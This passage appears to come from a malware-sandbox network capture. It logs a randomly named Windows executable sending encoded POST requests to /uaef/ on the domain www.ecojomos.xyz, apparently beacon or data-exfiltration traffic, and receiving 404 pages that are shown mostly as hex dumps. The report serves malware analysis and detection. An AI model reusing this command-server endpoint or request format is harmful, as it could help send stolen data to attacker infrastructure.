                                                                                  Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 64 6e 6a 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 2f 61 6a 61 78 2f 6c 69 62 73 2f 6e 6f 72 6d 61 6c 69 7a 65 2f 35 2e 30 2e 30 2f 6e 6f 72 6d 61 6c 69 7a 65 2e 6d 69 6e 2e 63 73 73 22 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2f 34 32 2e 63 73 73 22 3e 0a 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 21 2d 2d 20 70 61 72 74 69 61 6c 3a 69 6e 64 65 78 2e 70 61 72 74 69 61 6c 2e 68 74 6d 6c 20 2d 2d 3e 0a 3c 6d 61 69 6e 3e 0a 20 3c 73 76 67 0a 20 20 20 20 20 76 69 65 77 42 6f 78 3d 22 30 20 30 20 35 34 31 2e 31 37 32 30 36 20 33 32 38 [TRUNCATED]
                                                                                  Data Ascii: <!DOCTYPE html><html lang="en" ><head> <meta charset="UTF-8"> <title>404 Not Found</title> <link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/normalize/5.0.0/normalize.min.css"><link rel="stylesheet" href="/42.css"></head><body>... partial:index.partial.html --><main> <svg viewBox="0 0 541.17206 328.45184" height="328.45184" width="541.17206" id="svg2" version="1.1"> <metadata id="metadata8"> </metadata> <defs id="defs6"> <pattern patternUnits="userSpaceOnUse" width="1.5" height="1" patternTransform="translate(0,0) scale(10,10)" id="Strips2_1"> <rect style="fill:black;stroke:none" x="0" y="-0.5" width="1" height="2" id="rect5419" /> </pattern> <linearGradient osb:paint="solid" id="linearGradient6096"> <stop id="stop6094" offset="0" [TRUNCATED]
                                                                                  Nov 13, 2024 15:35:05.997863054 CET1236INData Raw: 3e 0a 20 20 20 20 3c 2f 64 65 66 73 3e 0a 20 20 20 20 3c 67 0a 20 20 20 20 20 20 20 74 72 61 6e 73 66 6f 72 6d 3d 22 74 72 61 6e 73 6c 61 74 65 28 31 37 30 2e 31 34 35 31 35 2c 30 2e 30 33 38 31 36 34 29 22 0a 20 20 20 20 20 20 20 69 64 3d 22 6c
                                                                                  Data Ascii: > </defs> <g transform="translate(170.14515,0.038164)" id="layer1"> <g id="g6219" > <path transform="matrix(1.0150687,0,0,11.193923,-1.3895945,-2685.7441)" style="disp
                                                                                  Nov 13, 2024 15:35:05.997879982 CET1236INData Raw: 38 2e 38 35 38 37 31 35 20 2d 30 2e 36 30 32 31 37 35 2c 2d 33 31 2e 34 36 39 32 32 38 20 2d 30 2e 30 31 32 35 33 2c 2d 32 32 2e 37 35 39 35 36 35 20 30 2e 37 31 37 32 36 32 2c 2d 34 31 2e 32 33 31 34 35 32 31 33 20 31 2e 36 32 38 39 39 35 2c 2d
                                                                                  Data Ascii: 8.858715 -0.602175,-31.469228 -0.01253,-22.759565 0.717262,-41.23145213 1.628995,-41.23195399 z" style="display:inline;fill:#000000;stroke:none;stroke-width:0.23743393px;stroke-linecap:butt;stroke-linejoin:miter;stroke-opacity:1;"
                                                                                  Nov 13, 2024 15:35:05.997890949 CET1236INData Raw: 30 2e 37 36 32 37 32 22 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 69 64 3d 22 72 65 63 74 34 35 35 33 22 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 73 74 79 6c 65 3d 22 64 69 73 70 6c 61 79 3a 69 6e 6c 69 6e 65 3b 6f 70 61 63 69 74 79 3a 31 3b 66
                                                                                  Data Ascii: 0.76272" id="rect4553" style="display:inline;opacity:1;fill:#000000;fill-opacity:1;fill-rule:nonzero;stroke:#000000;stroke-width:1.00157475;stroke-miterlimit:4;stroke-dasharray:none;stroke-opacity:1;" /> <pa
                                                                                  Nov 13, 2024 15:35:05.997903109 CET848INData Raw: 32 2c 31 35 2e 35 30 30 36 34 20 30 2e 39 31 36 37 39 38 2c 36 2e 38 33 34 33 34 20 32 2e 32 34 39 38 35 34 2c 31 36 2e 33 33 32 33 37 20 33 2e 34 39 39 39 30 32 2c 32 34 2e 39 31 36 30 34 20 31 2e 32 35 30 30 34 37 2c 38 2e 35 38 33 36 38 20 32
                                                                                  Data Ascii: 2,15.50064 0.916798,6.83434 2.249854,16.33237 3.499902,24.91604 1.250047,8.58368 2.416611,16.24967 4.583438,28.58394 2.166827,12.33427 5.333153,29.33244 8.499966,46.33323" style="display:inline;fill:none;stroke:#000000;stroke-widt
                                                                                  Nov 13, 2024 15:35:05.998128891 CET1236INData Raw: 70 3a 62 75 74 74 3b 73 74 72 6f 6b 65 2d 6c 69 6e 65 6a 6f 69 6e 3a 6d 69 74 65 72 3b 73 74 72 6f 6b 65 2d 6f 70 61 63 69 74 79 3a 31 3b 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 20 20 3c 70 61 74 68 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 69 64
                                                                                  Data Ascii: p:butt;stroke-linejoin:miter;stroke-opacity:1;" /> <path id="path4525" d="m 91.9375,124.09998 c 5.854072,7.16655 11.70824,14.33322 16.21863,20.16651 4.51039,5.83328 7.67706,10.33329 11.92718,16.33346 4.25012
                                                                                  Nov 13, 2024 15:35:05.998140097 CET1236INData Raw: 30 35 2c 35 2e 38 30 34 31 36 20 31 2e 34 35 38 35 30 35 2c 36 2e 39 38 32 35 37 20 32 2e 34 30 32 30 32 31 2c 31 31 2e 31 31 30 35 32 20 30 2e 39 34 33 35 31 37 2c 34 2e 31 32 37 39 35 20 32 2e 38 32 37 35 33 35 2c 31 31 2e 31 39 33 30 32 20 34
                                                                                  Data Ascii: 05,5.80416 1.458505,6.98257 2.402021,11.11052 0.943517,4.12795 2.827535,11.19302 4.065005,16.02501 1.23748,4.832 1.82668,7.42447 2.12139,10.84263 0.29471,3.41815 0.29471,7.65958 -0.11785,20.44893 -0.41255,12.78934 -1.23731,34.11536 -2.18014,53
                                                                                  Nov 13, 2024 15:35:05.998152018 CET424INData Raw: 33 39 20 31 2e 31 31 39 39 33 32 2c 31 39 2e 38 30 33 37 39 20 32 2e 34 31 35 35 37 34 2c 33 37 2e 30 30 30 34 39 20 33 2e 37 31 32 30 30 35 2c 35 34 2e 32 30 37 36 37 22 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 73 74 79 6c 65 3d 22 64 69 73 70
                                                                                  Data Ascii: 39 1.119932,19.80379 2.415574,37.00049 3.712005,54.20767" style="display:inline;fill:none;stroke:#000000;stroke-width:1px;stroke-linecap:butt;stroke-linejoin:miter;stroke-opacity:1;" /> <path id="path4549"
                                                                                  Nov 13, 2024 15:35:05.998259068 CET1236INData Raw: 34 2c 31 31 2e 35 34 39 32 32 20 2d 31 2e 33 35 35 34 31 39 2c 32 34 2e 35 37 34 31 35 20 30 2e 39 34 32 39 37 34 2c 31 33 2e 30 32 34 39 33 20 32 2e 38 32 38 31 38 32 2c 33 34 2e 34 36 39 31 37 20 35 2e 30 36 36 30 39 35 2c 35 33 2e 38 34 37 34
                                                                                  Data Ascii: 4,11.54922 -1.355419,24.57415 0.942974,13.02493 2.828182,34.46917 5.066095,53.84746 2.237913,19.37829 4.833109,36.71892 7.425959,54.04387" style="display:inline;fill:none;stroke:#000000;stroke-width:1px;stroke-linecap:butt;stroke-
                                                                                  Nov 13, 2024 15:35:05.998267889 CET212INData Raw: 69 64 3d 22 70 61 74 68 34 35 32 39 22 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 64 3d 22 6d 20 31 33 32 2e 36 38 37 35 2c 32 36 33 2e 33 34 39 39 38 20 63 20 2d 34 2e 32 32 38 39 2c 31 38 2e 34 31 35 35 20 2d 38 2e 34 35 38 30 36 2c 33 36 2e 38
                                                                                  Data Ascii: id="path4529" d="m 132.6875,263.34998 c -4.2289,18.4155 -8.45806,36.83216 -12.6875,55.25" style="display:inline;fill:none;stroke:#000000;stroke-width:1px;stroke-linecap:butt;stroke-linej
                                                                                  Nov 13, 2024 15:35:06.003115892 CET1236INData Raw: 6f 69 6e 3a 6d 69 74 65 72 3b 73 74 72 6f 6b 65 2d 6f 70 61 63 69 74 79 3a 31 3b 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 20 20 3c 65 6c 6c 69 70 73 65 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 72 79 3d 22 34 2e 36 37 31 35 37 31 37 22 0a 20 20 20
                                                                                  Data Ascii: oin:miter;stroke-opacity:1;" /> <ellipse ry="4.6715717" rx="2.5" cy="238.08525" cx="119.12262" id="path4614" style="display:inline;opacity:1;fill:#000000;f


                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                  14192.168.2.549996203.161.46.205803160C:\Program Files (x86)\zbtoDJDOWcuVKPOeaueHkoNZCMlCoMtGKyvWbXEUYq\LiiDBuNLRIYu.exe
                                                                                  TimestampBytes transferredDirectionData
                                                                                  Nov 13, 2024 15:35:07.866269112 CET720OUTPOST /uaef/ HTTP/1.1
                                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                                  Accept-Language: en-US
                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                  Host: www.ecojomos.xyz
                                                                                  Origin: http://www.ecojomos.xyz
                                                                                  Referer: http://www.ecojomos.xyz/uaef/
                                                                                  Connection: close
                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                  Content-Length: 223
                                                                                  Cache-Control: max-age=0
                                                                                  User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.0; de; rv:1.9.2) Gecko/20100115 Firefox/3.6
                                                                                  Data Raw: 32 4a 3d 2b 6c 48 31 50 73 4d 6b 78 75 6f 2f 74 6e 6c 69 74 4a 78 64 2f 71 56 4c 75 2f 57 49 6f 4c 69 37 5a 44 41 78 45 46 6c 42 70 5a 68 56 5a 44 50 6e 4f 61 30 31 50 69 44 72 38 68 4d 56 63 59 69 68 2b 65 79 6b 4f 2b 45 48 51 4b 46 73 66 2b 39 33 53 63 4d 76 72 46 73 64 41 6c 7a 69 62 4c 72 44 46 71 2b 78 72 44 67 6f 38 47 5a 4e 34 39 53 4c 72 4e 6f 56 4e 36 6f 79 35 4b 78 79 71 53 65 74 2b 32 49 68 37 30 58 30 37 54 6f 75 35 39 43 54 79 69 57 33 70 5a 45 37 44 56 64 49 6a 7a 4a 65 6c 49 50 5a 48 44 41 6d 6f 52 74 32 4e 42 50 78 76 74 69 42 4f 45 4c 64 50 48 64 50 4a 56 4f 66 34 33 36 49 57 39 46 79 2b 30 4c 53 71 73 4e 36 39 34 38 44 73 4c 32 41 5a 73 74 67
                                                                                  Data Ascii: 2J=+lH1PsMkxuo/tnlitJxd/qVLu/WIoLi7ZDAxEFlBpZhVZDPnOa01PiDr8hMVcYih+eykO+EHQKFsf+93ScMvrFsdAlzibLrDFq+xrDgo8GZN49SLrNoVN6oy5KxyqSet+2Ih70X07Tou59CTyiW3pZE7DVdIjzJelIPZHDAmoRt2NBPxvtiBOELdPHdPJVOf436IW9Fy+0LSqsN6948DsL2AZstg
                                                                                  Nov 13, 2024 15:35:08.532572985 CET1236INHTTP/1.1 404 Not Found
                                                                                  Date: Wed, 13 Nov 2024 14:35:08 GMT
                                                                                  Server: Apache
                                                                                  Content-Length: 16052
                                                                                  Connection: close
                                                                                  Content-Type: text/html
                                                                                  Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 64 6e 6a 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 2f 61 6a 61 78 2f 6c 69 62 73 2f 6e 6f 72 6d 61 6c 69 7a 65 2f 35 2e 30 2e 30 2f 6e 6f 72 6d 61 6c 69 7a 65 2e 6d 69 6e 2e 63 73 73 22 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2f 34 32 2e 63 73 73 22 3e 0a 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 21 2d 2d 20 70 61 72 74 69 61 6c 3a 69 6e 64 65 78 2e 70 61 72 74 69 61 6c 2e 68 74 6d 6c 20 2d 2d 3e 0a 3c 6d 61 69 6e 3e 0a 20 3c 73 76 67 0a 20 20 20 20 20 76 69 65 77 42 6f 78 3d 22 30 20 30 20 35 34 31 2e 31 37 32 30 36 20 33 32 38 [TRUNCATED]
                                                                                  Data Ascii: <!DOCTYPE html><html lang="en" ><head> <meta charset="UTF-8"> <title>404 Not Found</title> <link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/normalize/5.0.0/normalize.min.css"><link rel="stylesheet" href="/42.css"></head><body>... partial:index.partial.html --><main> <svg viewBox="0 0 541.17206 328.45184" height="328.45184" width="541.17206" id="svg2" version="1.1"> <metadata id="metadata8"> </metadata> <defs id="defs6"> <pattern patternUnits="userSpaceOnUse" width="1.5" height="1" patternTransform="translate(0,0) scale(10,10)" id="Strips2_1"> <rect style="fill:black;stroke:none" x="0" y="-0.5" width="1" height="2" id="rect5419" /> </pattern> <linearGradient osb:paint="solid" id="linearGradient6096"> <stop id="stop6094" offset="0" [TRUNCATED]
                                                                                  Nov 13, 2024 15:35:08.532588005 CET1236INData Raw: 3e 0a 20 20 20 20 3c 2f 64 65 66 73 3e 0a 20 20 20 20 3c 67 0a 20 20 20 20 20 20 20 74 72 61 6e 73 66 6f 72 6d 3d 22 74 72 61 6e 73 6c 61 74 65 28 31 37 30 2e 31 34 35 31 35 2c 30 2e 30 33 38 31 36 34 29 22 0a 20 20 20 20 20 20 20 69 64 3d 22 6c
                                                                                  Data Ascii: > </defs> <g transform="translate(170.14515,0.038164)" id="layer1"> <g id="g6219" > <path transform="matrix(1.0150687,0,0,11.193923,-1.3895945,-2685.7441)" style="disp
                                                                                  Nov 13, 2024 15:35:08.532598972 CET1236INData Raw: 38 2e 38 35 38 37 31 35 20 2d 30 2e 36 30 32 31 37 35 2c 2d 33 31 2e 34 36 39 32 32 38 20 2d 30 2e 30 31 32 35 33 2c 2d 32 32 2e 37 35 39 35 36 35 20 30 2e 37 31 37 32 36 32 2c 2d 34 31 2e 32 33 31 34 35 32 31 33 20 31 2e 36 32 38 39 39 35 2c 2d
                                                                                  Data Ascii: 8.858715 -0.602175,-31.469228 -0.01253,-22.759565 0.717262,-41.23145213 1.628995,-41.23195399 z" style="display:inline;fill:#000000;stroke:none;stroke-width:0.23743393px;stroke-linecap:butt;stroke-linejoin:miter;stroke-opacity:1;"
                                                                                  Nov 13, 2024 15:35:08.532609940 CET636INData Raw: 30 2e 37 36 32 37 32 22 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 69 64 3d 22 72 65 63 74 34 35 35 33 22 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 73 74 79 6c 65 3d 22 64 69 73 70 6c 61 79 3a 69 6e 6c 69 6e 65 3b 6f 70 61 63 69 74 79 3a 31 3b 66
                                                                                  Data Ascii: 0.76272" id="rect4553" style="display:inline;opacity:1;fill:#000000;fill-opacity:1;fill-rule:nonzero;stroke:#000000;stroke-width:1.00157475;stroke-miterlimit:4;stroke-dasharray:none;stroke-opacity:1;" /> <pa
                                                                                  Nov 13, 2024 15:35:08.532658100 CET1236INData Raw: 38 2e 36 36 33 34 39 20 34 2e 34 31 36 36 34 32 2c 31 38 2e 34 31 36 37 36 20 39 2e 37 39 38 33 35 36 2c 33 35 2e 39 31 36 37 35 20 31 35 2e 31 38 30 32 36 37 2c 35 33 2e 34 31 37 33 38 22 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 73 74 79 6c 65
                                                                                  Data Ascii: 8.66349 4.416642,18.41676 9.798356,35.91675 15.180267,53.41738" style="display:inline;fill:none;stroke:#000000;stroke-width:1px;stroke-linecap:butt;stroke-linejoin:miter;stroke-opacity:1;" /> <path id="path4
                                                                                  Nov 13, 2024 15:35:08.532669067 CET212INData Raw: 30 32 2c 33 31 2e 32 34 36 31 39 20 2d 32 2e 31 38 33 37 36 2c 31 31 2e 39 39 36 39 38 20 2d 34 2e 38 31 36 31 36 2c 32 34 2e 33 33 36 33 32 20 2d 38 2e 34 32 30 36 33 2c 33 38 2e 39 39 38 30 39 20 2d 33 2e 36 30 34 34 38 2c 31 34 2e 36 36 31 37
                                                                                  Data Ascii: 02,31.24619 -2.18376,11.99698 -4.81616,24.33632 -8.42063,38.99809 -3.60448,14.66177 -8.06212,31.17154 -12.56244,47.83939" style="display:inline;fill:none;stroke:#000000;stroke-width:1px;stroke-lineca
                                                                                  Nov 13, 2024 15:35:08.532782078 CET1236INData Raw: 70 3a 62 75 74 74 3b 73 74 72 6f 6b 65 2d 6c 69 6e 65 6a 6f 69 6e 3a 6d 69 74 65 72 3b 73 74 72 6f 6b 65 2d 6f 70 61 63 69 74 79 3a 31 3b 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 20 20 3c 70 61 74 68 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 69 64
                                                                                  Data Ascii: p:butt;stroke-linejoin:miter;stroke-opacity:1;" /> <path id="path4525" d="m 91.9375,124.09998 c 5.854072,7.16655 11.70824,14.33322 16.21863,20.16651 4.51039,5.83328 7.67706,10.33329 11.92718,16.33346 4.25012
                                                                                  Nov 13, 2024 15:35:08.532800913 CET1236INData Raw: 30 35 2c 35 2e 38 30 34 31 36 20 31 2e 34 35 38 35 30 35 2c 36 2e 39 38 32 35 37 20 32 2e 34 30 32 30 32 31 2c 31 31 2e 31 31 30 35 32 20 30 2e 39 34 33 35 31 37 2c 34 2e 31 32 37 39 35 20 32 2e 38 32 37 35 33 35 2c 31 31 2e 31 39 33 30 32 20 34
                                                                                  Data Ascii: 05,5.80416 1.458505,6.98257 2.402021,11.11052 0.943517,4.12795 2.827535,11.19302 4.065005,16.02501 1.23748,4.832 1.82668,7.42447 2.12139,10.84263 0.29471,3.41815 0.29471,7.65958 -0.11785,20.44893 -0.41255,12.78934 -1.23731,34.11536 -2.18014,53
                                                                                  Nov 13, 2024 15:35:08.532813072 CET424INData Raw: 33 39 20 31 2e 31 31 39 39 33 32 2c 31 39 2e 38 30 33 37 39 20 32 2e 34 31 35 35 37 34 2c 33 37 2e 30 30 30 34 39 20 33 2e 37 31 32 30 30 35 2c 35 34 2e 32 30 37 36 37 22 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 73 74 79 6c 65 3d 22 64 69 73 70
                                                                                  Data Ascii: 39 1.119932,19.80379 2.415574,37.00049 3.712005,54.20767" style="display:inline;fill:none;stroke:#000000;stroke-width:1px;stroke-linecap:butt;stroke-linejoin:miter;stroke-opacity:1;" /> <path id="path4549"
                                                                                  Nov 13, 2024 15:35:08.533004999 CET1236INData Raw: 34 2c 31 31 2e 35 34 39 32 32 20 2d 31 2e 33 35 35 34 31 39 2c 32 34 2e 35 37 34 31 35 20 30 2e 39 34 32 39 37 34 2c 31 33 2e 30 32 34 39 33 20 32 2e 38 32 38 31 38 32 2c 33 34 2e 34 36 39 31 37 20 35 2e 30 36 36 30 39 35 2c 35 33 2e 38 34 37 34
                                                                                  Data Ascii: 4,11.54922 -1.355419,24.57415 0.942974,13.02493 2.828182,34.46917 5.066095,53.84746 2.237913,19.37829 4.833109,36.71892 7.425959,54.04387" style="display:inline;fill:none;stroke:#000000;stroke-width:1px;stroke-linecap:butt;stroke-
                                                                                  Nov 13, 2024 15:35:08.537866116 CET1236INData Raw: 69 64 3d 22 70 61 74 68 34 35 32 39 22 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 64 3d 22 6d 20 31 33 32 2e 36 38 37 35 2c 32 36 33 2e 33 34 39 39 38 20 63 20 2d 34 2e 32 32 38 39 2c 31 38 2e 34 31 35 35 20 2d 38 2e 34 35 38 30 36 2c 33 36 2e 38
                                                                                  Data Ascii: id="path4529" d="m 132.6875,263.34998 c -4.2289,18.4155 -8.45806,36.83216 -12.6875,55.25" style="display:inline;fill:none;stroke:#000000;stroke-width:1px;stroke-linecap:butt;stroke-linejoin:miter;stroke-opacity:1;" />


                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                  15192.168.2.549997203.161.46.205803160C:\Program Files (x86)\zbtoDJDOWcuVKPOeaueHkoNZCMlCoMtGKyvWbXEUYq\LiiDBuNLRIYu.exe
                                                                                  TimestampBytes transferredDirectionData
                                                                                  Nov 13, 2024 15:35:10.414585114 CET1737OUTPOST /uaef/ HTTP/1.1
                                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                                  Accept-Language: en-US
                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                  Host: www.ecojomos.xyz
                                                                                  Origin: http://www.ecojomos.xyz
                                                                                  Referer: http://www.ecojomos.xyz/uaef/
                                                                                  Connection: close
                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                  Content-Length: 1239
                                                                                  Cache-Control: max-age=0
                                                                                  User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.0; de; rv:1.9.2) Gecko/20100115 Firefox/3.6
                                                                                  Data Raw: 32 4a 3d 2b 6c 48 31 50 73 4d 6b 78 75 6f 2f 74 6e 6c 69 74 4a 78 64 2f 71 56 4c 75 2f 57 49 6f 4c 69 37 5a 44 41 78 45 46 6c 42 70 5a 35 56 5a 79 76 6e 42 5a 63 31 4d 69 44 72 67 78 4e 79 63 59 69 34 2b 65 36 67 4f 2b 49 58 51 50 4a 73 4e 74 31 33 51 74 4d 76 69 46 73 64 43 6c 7a 68 45 62 72 57 46 71 76 34 72 44 77 6f 38 47 5a 4e 34 38 69 4c 73 59 45 56 50 36 6f 78 34 4b 78 2b 75 53 66 49 2b 32 51 62 37 33 37 6b 37 6a 49 75 34 64 79 54 68 67 2b 33 32 70 45 35 45 56 63 64 6a 7a 4d 41 6c 49 54 76 48 44 45 63 6f 57 5a 32 4f 6c 79 36 39 65 36 62 66 57 48 62 64 6d 68 71 58 53 69 6c 33 30 7a 35 4c 4f 52 79 33 32 58 6b 2f 70 34 39 78 36 6f 4f 33 76 53 49 51 59 34 47 37 70 76 51 78 77 4a 70 59 55 63 64 64 4d 6e 36 79 75 47 4f 67 56 7a 77 65 74 33 30 35 32 2b 46 64 72 45 6a 50 4b 6f 56 30 54 34 41 47 46 78 79 79 69 6d 2b 42 2f 4d 47 46 56 61 2b 2f 64 4a 39 34 42 43 78 69 39 78 59 6e 38 76 6c 57 63 5a 71 65 4c 4c 2f 62 4a 49 78 70 75 48 59 63 41 73 6b 78 6f 77 39 33 36 59 79 37 2b 50 42 35 72 35 68 73 77 65 [TRUNCATED]
                                                                                  Data Ascii: 2J=+lH1PsMkxuo/tnlitJxd/qVLu/WIoLi7ZDAxEFlBpZ5VZyvnBZc1MiDrgxNycYi4+e6gO+IXQPJsNt13QtMviFsdClzhEbrWFqv4rDwo8GZN48iLsYEVP6ox4Kx+uSfI+2Qb737k7jIu4dyThg+32pE5EVcdjzMAlITvHDEcoWZ2Oly69e6bfWHbdmhqXSil30z5LORy32Xk/p49x6oO3vSIQY4G7pvQxwJpYUcddMn6yuGOgVzwet3052+FdrEjPKoV0T4AGFxyyim+B/MGFVa+/dJ94BCxi9xYn8vlWcZqeLL/bJIxpuHYcAskxow936Yy7+PB5r5hswef4G88zbmQLuSWZubsP5hrIECM3cG4N9QlhqUWCMWIAhqToEfZ0TGYXjVUrx4hyHZBozDA6MFtQcHOzscLy52lSL/O8PstkDbOJHCVBcGmn1cQas+TepBrUW0o/ODrHmnUbiiUvsfRbbgWRtzoiKe6St83rG63j51AVW/sONCfDdancFlvmCNh4zyXwI3eUjDdR91bwsu9p71WDLkG8crcNp9yniqOLg2DTnakHN1mZGwNfCfU1kqMMfGIELfnDNro9K4JPaYNQ0bY/8gChRBT9R3DYkfjIFzm18I18ne28MTGYQdz7Xl7mTK1TqI6RCYefiSczaQ9UkKSdJPh+BmcKj0Zc3cNZBdJpl4PVQ96a2d0FQZWEinJ1WZmVfTQbQyuqbDYathoHetafsJ227PzaSSZaNYNFKjbtQf71GlVq4LvVVt6DqDwUpb58IHJnsyrISySbrOgRhu6q+NXS9fdRp0t/fXz/4tfdVI+6NLDgWrTuBrMXPjpFUT0wn1aGVl3kp8rtF6bRVO7sZXu2VDxsloY/W0KMZQvp1fD84uUcBSxVjvtd8CoW+NpDffQFMsC0a07kOLf7NoMQoBlcvX1eHsC7qOweR6TAxXDAz9k7WARCv04ONOrLkBGj3ZO4LIUbTwDfynqOnDWYfazrVRr8JjEWMhh1B86A [TRUNCATED]
                                                                                  Nov 13, 2024 15:35:11.091475964 CET1236INHTTP/1.1 404 Not Found
                                                                                  Date: Wed, 13 Nov 2024 14:35:11 GMT
                                                                                  Server: Apache
                                                                                  Content-Length: 16052
                                                                                  Connection: close
                                                                                  Content-Type: text/html
                                                                                  Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 64 6e 6a 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 2f 61 6a 61 78 2f 6c 69 62 73 2f 6e 6f 72 6d 61 6c 69 7a 65 2f 35 2e 30 2e 30 2f 6e 6f 72 6d 61 6c 69 7a 65 2e 6d 69 6e 2e 63 73 73 22 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2f 34 32 2e 63 73 73 22 3e 0a 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 21 2d 2d 20 70 61 72 74 69 61 6c 3a 69 6e 64 65 78 2e 70 61 72 74 69 61 6c 2e 68 74 6d 6c 20 2d 2d 3e 0a 3c 6d 61 69 6e 3e 0a 20 3c 73 76 67 0a 20 20 20 20 20 76 69 65 77 42 6f 78 3d 22 30 20 30 20 35 34 31 2e 31 37 32 30 36 20 33 32 38 [TRUNCATED]
                                                                                  Data Ascii: <!DOCTYPE html><html lang="en" ><head> <meta charset="UTF-8"> <title>404 Not Found</title> <link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/normalize/5.0.0/normalize.min.css"><link rel="stylesheet" href="/42.css"></head><body>... partial:index.partial.html --><main> <svg viewBox="0 0 541.17206 328.45184" height="328.45184" width="541.17206" id="svg2" version="1.1"> <metadata id="metadata8"> </metadata> <defs id="defs6"> <pattern patternUnits="userSpaceOnUse" width="1.5" height="1" patternTransform="translate(0,0) scale(10,10)" id="Strips2_1"> <rect style="fill:black;stroke:none" x="0" y="-0.5" width="1" height="2" id="rect5419" /> </pattern> <linearGradient osb:paint="solid" id="linearGradient6096"> <stop id="stop6094" offset="0" [TRUNCATED]
                                                                                  Nov 13, 2024 15:35:11.091500044 CET1236INData Raw: 3e 0a 20 20 20 20 3c 2f 64 65 66 73 3e 0a 20 20 20 20 3c 67 0a 20 20 20 20 20 20 20 74 72 61 6e 73 66 6f 72 6d 3d 22 74 72 61 6e 73 6c 61 74 65 28 31 37 30 2e 31 34 35 31 35 2c 30 2e 30 33 38 31 36 34 29 22 0a 20 20 20 20 20 20 20 69 64 3d 22 6c
                                                                                  Data Ascii: > </defs> <g transform="translate(170.14515,0.038164)" id="layer1"> <g id="g6219" > <path transform="matrix(1.0150687,0,0,11.193923,-1.3895945,-2685.7441)" style="disp
                                                                                  Nov 13, 2024 15:35:11.091510057 CET1236INData Raw: 38 2e 38 35 38 37 31 35 20 2d 30 2e 36 30 32 31 37 35 2c 2d 33 31 2e 34 36 39 32 32 38 20 2d 30 2e 30 31 32 35 33 2c 2d 32 32 2e 37 35 39 35 36 35 20 30 2e 37 31 37 32 36 32 2c 2d 34 31 2e 32 33 31 34 35 32 31 33 20 31 2e 36 32 38 39 39 35 2c 2d
